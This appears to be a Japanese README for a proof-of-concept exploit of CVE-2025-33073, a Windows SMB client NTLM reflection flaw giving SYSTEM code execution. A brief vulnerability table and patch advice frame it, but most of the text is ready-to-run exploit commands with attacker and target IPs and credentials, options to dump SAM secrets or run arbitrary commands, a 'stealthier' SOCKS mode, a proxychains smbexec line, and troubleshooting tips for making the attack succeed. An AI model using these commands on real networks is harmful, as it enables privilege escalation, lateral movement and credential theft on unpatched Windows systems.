
CVE-2025-33073
🔥 高重大度の認証済みリモートコード実行 🔥 Windows SMB クライアントにおける不適切なアクセス制御 (CWE-284)
| 項目 | 詳細 |
|---|
| CVSS v3.1 スコア | 8.8 (高) 🔥 |
| 影響を受けるシステム | Windows 10, 11, Server 2012–2025 (全エディション) 💻 |
| 開示日 | 2025年6月10日 📅 (2025年6月のPatch Tuesday で修正) |
| 悪用状況 | 実際に積極的に悪用されています 😱 2025年10月21日に CISA KEV に追加 |
| 攻撃ベクトル | ネットワーク (認証済み) 🌐 |
| 影響 | SYSTEM レベルのコード実行 👑 Kerberos リレーによる横展開 |
| 回避 | NTLM リフレクションの緩和策 ⚡ |
今すぐパッチを適用! 🔧
→ Microsoft の更新プログラムを適用 (例: KB5060998)
→ Microsoft Update Guide 🔗
SMB 署名を有効化 ✍️
→ すべてのクライアントとサーバー で強制
→ Set-SmbClientConfiguration -RequireSecuritySignature $true
NTLM を制限 🚫
→ 可能な限り NTLM をブロック
→ EDR ツールでリレー試行を監視
自動修正? 🤖
→ Vicarius vRx またはカスタムスクリプトを使用して大規模修正
2025年11月15日時点のステータス:
✅ 修正済み
❌ 未修正のシステムではまだ悪用されています
🔔 CISA 期限: 2025年11月10日 ⏰
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65

sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only

カスタムコマンド secretsdump を実行する代わりに、カスタムコマンドを実行できます。
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"

SOCKS SYSTEM として有効な接続が確立された後、よりステルスにコマンドを実行するため。--target と --target-ip はここでは同じにしてください。
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks

また、SAM をダンプする代わりに、proxychains 経由でカスタムコマンドを実行できます。
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

デバイスと同じブロードキャストドメインにあり、LLMNR ポイズニングに対して脆弱な場合、DNS レコードを登録しなくてもデバイスを悪用することが可能です。

攻撃にホスト名が使用され、Kali からの DNS ルックアップが発生するため、攻撃が機能しない場合があります。Kali が DNS サーバーを使用していない場合、または impacket-ntlmrelayx から '/ FAILED' メッセージが表示される場合は、ホストを /etc/hosts ファイルに追加してみてください。これにより攻撃が機能するはずです。
IP を使用すれば攻撃は機能するはずです。複数回実行すると、失敗ではなく SUCCESS になる場合があります。なぜこれが起こるのかは今のところ完全には明らかではありません。ネットワークに関係していると思います。
-M または --method を使用して別の強制方法を試してください。
ローカル NTLM 認証が行われる

ローカル NTLM 認証が行われず、FAILED 試行となる

待つな — 今すぐパッチを当てよう! 🛑
あなたのネットワークのセキュリティはそれにかかっている。 💪